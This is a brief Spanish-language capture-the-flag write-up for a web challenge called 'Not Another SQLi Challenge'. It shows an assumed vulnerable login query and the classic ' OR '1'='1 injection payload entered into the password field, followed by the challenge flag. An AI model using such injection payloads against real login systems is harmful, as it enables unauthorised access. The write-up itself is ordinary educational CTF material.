720 B
720 B
Not Another SQLi Challenge
(web 100)
Desarrollo
Para este problema se realizó una inyección SQL a un portal de login, se supuso que la consulta a la base de datos era de las más comunmente empleada, y que de igual forma no se realizaba ningún filtrado de caracteres especiales:
SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'
Bastaba con formular una oración como la siguiente:
SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%
Se llenaron los campos de la siguiente manera:
Usuario: root
Paswwrod: ' OR '1'='1
Así se obtuvo la flag:
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!